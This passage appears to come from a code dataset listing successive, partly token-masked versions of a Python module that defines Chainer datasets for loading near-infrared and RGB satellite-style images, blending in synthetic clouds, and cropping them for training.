cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha 
= cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = 
np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, 
rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n <function token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = 
self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, 
dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n <function token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, 
imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n <function token>\n <function token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 